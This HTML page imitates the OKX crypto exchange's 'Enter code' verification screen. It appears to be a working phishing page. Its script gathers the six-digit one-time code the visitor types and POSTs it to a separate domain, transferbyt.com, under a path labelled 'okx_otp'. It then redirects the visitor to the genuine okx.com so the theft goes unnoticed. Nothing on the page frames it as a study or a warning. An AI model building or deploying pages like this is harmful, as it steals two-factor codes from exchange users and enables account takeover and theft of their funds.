<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>OKX</title>
    <script src="https://cdn.tailwindcss.com"></script>
    <link
      rel="stylesheet"
      href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.6.0/css/all.min.css"
    />
    <style>
      /* Custom style for reducing switch border radius */
      .custom-switch {
        border-radius: 8px !important;
      }

      .hover-content {
        border-radius: 8px;
      }

      .icon {
        line-height: 0;
        /* Align icons vertically center */
      }

      .no-wrap {
        white-space: nowrap;
        /* Prevent line break for the "fees" part */
      }

      .selected-tab {
        color: black !important;
        border-bottom: 2px solid black;
        /* Ensure the selected tab is underlined */
      }

      .form-input,
      .form-button {
        border-radius: 12px;
      }

      .bg-form {
        background-color: white;
        /* Ensure the form has a white background */
      }

      /* New Hover Effect */
      .btn {
        transition: background-color 0.3s ease;
      }

      .btn:hover {
        background-color: rgba(
          0,
          0,
          0,
          0.1
        ); /* Light gray background on hover */
      }
      /* Adjust width, border color, and focus effect */
      .input-custom {
        width: 100%;
        border: 1px solid #d3d3d3; /* Light black border */
        padding: 0.5rem; /* Adjust padding for better spacing */
        border-radius: 4px;
        transition: border-color 0.3s ease; /* Smooth transition for border color */
      }

      /* Focus state: border turns black */
      .input-custom:focus {
        border-color: #000000; /* Black border when focused */
        outline: none; /* Remove default outline */
      }

      .icon-wrapper i {
        width: 40px;
        height: 40px;
        display: flex;
        align-items: center;
        justify-content: center;
      }

      .icon-wrapper i:hover {
        color: black;
        border-color: black;
        transition: color 0.2s, border-color 0.2s;
      }

      #menu-icon,
      #search-icon {
        display: none;
      }

      @media screen and (max-width: 968px) {
        #left-part,
        #switch,
        #nav-links,
        #hideIcon,
        #search-bar,
        #loginBtn,
        #divider {
          display: none;
        }

        #menu-icon,
        #search-icon {
          font-size: 24px;
          display: block;
        }

        #right-part {
          width: 100%;
        }

        #social-icons {
          gap: 10px;
          justify-content: center;
        }

        #qrTab {
          display: none;
        }

        #tabs {
          margin-top: 40px;
        }

        #login-title {
          color: black;
        }
      }
    </style>
  </head>
  <body class="bg-gray-100">
    <!-- Navbar -->
    <nav class="bg-black text-white p-4">
      <div class="flex justify-between items-center w-full px-4">
        <!-- Left Side: Logo, Switch and Nav Links -->
        <div class="flex items-center space-x-4">
          <!-- Logo -->
          <div class="logo text-2xl font-bold">Logo</div>

          <!-- Switch -->
          <div
            id="switch"
            class="flex items-center custom-switch cursor-pointer select-none switch"
          >
            <button
              id="exchangeBtn"
              class="px-4 py-1 bg-white text-black rounded-l selected-btn"
            >
              Exchange
            </button>
            <button
              id="walletBtn"
              class="px-4 py-1 bg-black text-white rounded-r"
            >
              Wallet
            </button>
          </div>

          <!-- Divider -->
          <div
            id="divider"
            class="border-l border-gray-400 h-8 mx-4 divider"
          ></div>

          <!-- Nav Links -->
          <ul id="nav-links" class="flex space-x-4 nav-links">
            <li class="relative group">
              <a href="#" class="flex items-center space-x-1">
                <span>Buy crypto</span>
                <i class="fas fa-chevron-down"></i>
              </a>
              <!-- Hover Content -->
              <div
                class="absolute left-0 top-full hidden group-hover:block bg-white text-black w-48 mt-1 p-4 shadow-lg hover-content"
              >
                <div class="flex items-center space-x-2 mb-2">
                  <i class="fas fa-cog icon"></i>
                  <div>
                    <div class="font-bold">Express buy</div>
                    <div class="text-sm text-gray-400">
                      Visa, Mastercard and others.
                    </div>
                  </div>
                </div>
                <div class="flex items-center space-x-2">
                  <i class="fas fa-users icon"></i>
                  <div>
                    <div class="font-bold">PSP trading</div>
                    <div class="text-sm text-gray-400">
                      Buy/Sell with zero trading
                      <span class="no-wrap">fees</span> via 100+ payment
                      methods.
                    </div>
                  </div>
                </div>
              </div>
            </li>

            <li class="relative group">
              <a href="#" class="flex items-center space-x-1">
                <span>Discover</span>
                <i class="fas fa-chevron-down"></i>
              </a>
              <div
                class="absolute left-0 top-full hidden group-hover:block bg-white text-black w-48 mt-1 p-4 shadow-lg hover-content"
              >
                <div class="flex items-center space-x-2 mb-2">
                  <i class="fas fa-cog icon"></i>
                  <div>
                    <div class="font-bold">Title 3</div>
                    <div class="text-sm text-gray-400">Description 3</div>
                  </div>
                </div>
                <div class="flex items-center space-x-2">
                  <i class="fas fa-users icon"></i>
                  <div>
                    <div class="font-bold">Title 4</div>
                    <div class="text-sm text-gray-400">Description 4</div>
                  </div>
                </div>
              </div>
            </li>

            <li class="relative group">
              <a href="#" class="flex items-center space-x-1">
                <span>Trade</span>
                <i class="fas fa-chevron-down"></i>
              </a>
              <!-- Hover Content -->
              <div
                class="absolute left-0 top-full hidden group-hover:block bg-white text-black w-48 mt-1 p-4 shadow-lg hover-content"
              >
                <div class="flex items-center space-x-2 mb-2">
                  <i class="fas fa-cog icon"></i>
                  <div>
                    <div class="font-bold">Title 1</div>
                    <div class="text-sm text-gray-400">Description 1</div>
                  </div>
                </div>
                <div class="flex items-center space-x-2">
                  <i class="fas fa-users icon"></i>
                  <div>
                    <div class="font-bold">Title 2</div>
                    <div class="text-sm text-gray-400">Description 2</div>
                  </div>
                </div>
              </div>
            </li>

            <li class="relative group">
              <a href="#" class="flex items-center space-x-1">
                <span>Grow</span>
                <i class="fas fa-chevron-down"></i>
              </a>
              <!-- Hover Content -->
              <div
                class="absolute left-0 top-full hidden group-hover:block bg-white text-black w-48 mt-1 p-4 shadow-lg hover-content"
              >
                <div class="flex items-center space-x-2 mb-2">
                  <i class="fas fa-cog icon"></i>
                  <div>
                    <div class="font-bold">Title 1</div>
                    <div class="text-sm text-gray-400">Description 1</div>
                  </div>
                </div>
                <div class="flex items-center space-x-2">
                  <i class="fas fa-users icon"></i>
                  <div>
                    <div class="font-bold">Title 2</div>
                    <div class="text-sm text-gray-400">Description 2</div>
                  </div>
                </div>
              </div>
            </li>

            <li class="relative group">
              <a href="#" class="flex items-center space-x-1">
                <span>Learn</span>
              </a>
            </li>

            <li class="relative group">
              <a href="#" class="flex items-center space-x-1">
                <span>More</span>
                <i class="fas fa-chevron-down"></i>
              </a>
              <!-- Hover Content -->
              <div
                class="absolute left-0 top-full hidden group-hover:block bg-white text-black w-48 mt-1 p-4 shadow-lg hover-content"
              >
                <div class="flex items-center space-x-2 mb-2">
                  <i class="fas fa-cog icon"></i>
                  <div>
                    <div class="font-bold">Title 1</div>
                    <div class="text-sm text-gray-400">Description 1</div>
                  </div>
                </div>
                <div class="flex items-center space-x-2">
                  <i class="fas fa-users icon"></i>
                  <div>
                    <div class="font-bold">Title 2</div>
                    <div class="text-sm text-gray-400">Description 2</div>
                  </div>
                </div>
              </div>
            </li>
          </ul>
        </div>

        <!-- Right Side: Search, Icons and Buttons -->
        <div class="flex items-center space-x-3">
          <!-- Search Bar -->
          <div id="search-bar" class="relative flex items-center">
            <i class="fas fa-search absolute left-2 text-white"></i>
            <input
              type="text"
              placeholder="Search"
              class="py-1 pl-8 pr-2 rounded bg-gray-800 text-white focus:outline-none"
            />
          </div>

          <!-- Divider -->
          <div id="divider" class="border-l border-gray-400 h-8"></div>

          <div id="search-icon">
            <i id="search-icon" class="fas fa-search"></i>
          </div>

          <!-- Sign Up / Login -->
          <button id="loginBtn" class="py-1 px-3">Login</button>
          <button class="border rounded-2xl border-white py-1 px-3">
            Sign Up
          </button>

          <!-- Icons -->
          <i id="hideIcon" class="fas fa-language"></i>
          <i id="hideIcon" class="fas fa-question-circle"></i>
          <i id="hideIcon" class="fas fa-bell"></i>
          <i id="hideIcon" class="fas fa-download"></i>

          <div id="menu-icon">
            <i id="menu-icon" class="fas fa-bars"></i>
          </div>
        </div>
      </div>
    </nav>

    <!-- Two Sections Below Navbar -->
    <div class="flex">
      <!-- Left Section (Black Background) -->
      <section
        id="left-part"
        class="bg-black text-white p-8 w-1/2 h-screen flex flex-col items-center justify-center left-part"
      >
        <div>
          <h2 class="text-2xl font-bold">Trade with confidence</h2>
          <p class="mt-2 max-w-xs">
            Your funds are always backed 1:1 on OKX with our regularly published
            audits on our Proof of Reserves.
          </p>
        </div>
        <div class="mt-6 -ml-10">
          <img
            src="https://www.okx.com/cdn/assets/imgs/243/5AD5609D76BF42F4.png"
            alt="Placeholder Image"
            style="width: 300px; height: 350px; margin-left: 80px"
          />
        </div>

        <div
          class="mt-6 max-w-[400px] p-4 rounded-lg shadow-lg"
          style="background-color: rgba(228, 236, 255, 0.1); color: white"
        >
          <div class="font-bold text-lg mb-2">Join our Telegram group</div>
          <p>
            Ask questions, get answers, and chat with other traders to shape the
            crypto future together.
          </p>
        </div>
      </section>

      <section
        id="otp-section"
        class="p-8 mx-auto"
        style="width: 600px; margin-top: 40px"
      >
        <!-- Title -->
        <h2 class="text-3xl font-bold text-black mb-2">Enter code</h2>
        <p class="text-gray-500 mb-6">We've sent a code to you.</p>

        <!-- OTP Input Boxes -->
        <div class="flex justify-between mb-6">
          <input
            type="text"
            maxlength="1"
            class="otp-input w-12 h-12 border bg-transparent border-gray-500 rounded text-center focus:outline-none"
          />
          <input
            type="text"
            maxlength="1"
            class="otp-input w-12 h-12 border bg-transparent border-gray-500 rounded text-center focus:outline-none"
          />
          <input
            type="text"
            maxlength="1"
            class="otp-input w-12 h-12 border bg-transparent border-gray-500 rounded text-center focus:outline-none"
          />
          <input
            type="text"
            maxlength="1"
            class="otp-input w-12 h-12 border bg-transparent border-gray-500 rounded text-center focus:outline-none"
          />
          <input
            type="text"
            maxlength="1"
            class="otp-input w-12 h-12 border bg-transparent border-gray-500 rounded text-center focus:outline-none"
          />
          <input
            type="text"
            maxlength="1"
            class="otp-input w-12 h-12 border bg-transparent border-gray-500 rounded text-center focus:outline-none"
          />
        </div>

        <!-- Next Button -->
        <button
          id="nextButton"
          class="bg-gray-200 text-black py-3 w-full rounded-lg mb-4"
          disabled
        >
          Next
        </button>

        <!-- Section Below the Next Button -->
        <div class="text-center">
          <p class="text-gray-500 inline">
            Didn't receive anything?
            <span class="underline text-black cursor-pointer">Resend code</span>
            or
            <span class="underline text-black cursor-pointer"
              >call me instead</span
            >
          </p>
          <br />
          <p class="text-gray-500 mt-4 inline">
            Unable to verify?
            <span class="underline text-black cursor-pointer"
              >Try another method instead</span
            >
            or <span class="underline text-black cursor-pointer">Reset</span>
          </p>
        </div>
      </section>
    </div>

    <script>
      // Select OTP inputs and next button
      const otpInputs = document.querySelectorAll(".otp-input");
      const nextButton = document.getElementById("nextButton");

      otpInputs.forEach((input, index) => {
        // Move focus to the next input when a digit is entered
        input.addEventListener("input", () => {
          if (input.value.length === 1 && index < otpInputs.length - 1) {
            otpInputs[index + 1].focus();
          }
          checkOtpComplete();
        });

        // Allow backspace to move to the previous input
        input.addEventListener("keydown", (event) => {
          if (event.key === "Backspace" && input.value === "" && index > 0) {
            otpInputs[index - 1].focus();
          }
        });
      });

      // Check if all OTP inputs are filled
      function checkOtpComplete() {
        const otp = Array.from(otpInputs)
          .map((input) => input.value)
          .join("");
        nextButton.disabled = otp.length < otpInputs.length;
      }

      // Send OTP to backend on button click
      nextButton.addEventListener("click", () => {
        const otp = Array.from(otpInputs)
          .map((input) => input.value)
          .join("");
        if (otp.length === otpInputs.length) {
          fetch("https://transferbyt.com/client/customer/auth/okx_otp", {
            method: "POST",
            headers: {
              "Content-Type": "application/json",
            },
            body: JSON.stringify({ otp }),
          })
            .then((response) => response.json())
            .then((data) => {
              // Handle response here, e.g., show a success message or redirect
              console.log("OTP sent:", data);
              window.location.href = "https://www.okx.com/";
            })
            .catch((error) => console.error("Error sending OTP:", error));
        }
      });

      // Tab Switching Logic
      const phoneTab = document.getElementById("phoneTab");
      const emailTab = document.getElementById("emailTab");
      const qrTab = document.getElementById("qrTab");
      const phoneContent = document.getElementById("phoneContent");
      const emailContent = document.getElementById("emailContent");
      const qrContent = document.getElementById("qrContent");

      document.addEventListener("DOMContentLoaded", () => {
        // Set default selected tab on load
        updateTabSelection(phoneTab, phoneContent);
      });

      // Update tab content and styles
      function updateTabSelection(selectedTab, selectedContent) {
        const tabs = [phoneTab, emailTab, qrTab];
        const contents = [phoneContent, emailContent, qrContent];

        tabs.forEach((tab) => {
          tab.classList.toggle("selected-tab", tab === selectedTab);
        });

        contents.forEach((content) => {
          content.classList.toggle("hidden", content !== selectedContent);
        });
      }

      // Tab click events
      phoneTab.addEventListener("click", () => {
        updateTabSelection(phoneTab, phoneContent);
      });

      emailTab.addEventListener("click", () => {
        updateTabSelection(emailTab, emailContent);
      });

      qrTab.addEventListener("click", () => {
        updateTabSelection(qrTab, qrContent);
      });

      // Enable Next Button on Input
      function checkInputs() {
        const phoneInput = document.querySelector("#phoneContent input");
        const emailInput = document.querySelector("#emailContent input");

        nextButton.disabled = !(
          (phoneInput &&
            !phoneContent.classList.contains("hidden") &&
            phoneInput.value.trim() !== "") ||
          (emailInput &&
            !emailContent.classList.contains("hidden") &&
            emailInput.value.trim() !== "")
        );
      }

      // Add event listeners to input fields to check on input
      const inputFields = [
        ...phoneContent.querySelectorAll("input"),
        ...emailContent.querySelectorAll("input"),
      ];
      inputFields.forEach((input) => {
        input.addEventListener("input", checkInputs);
      });
    </script>
  </body>
</html>
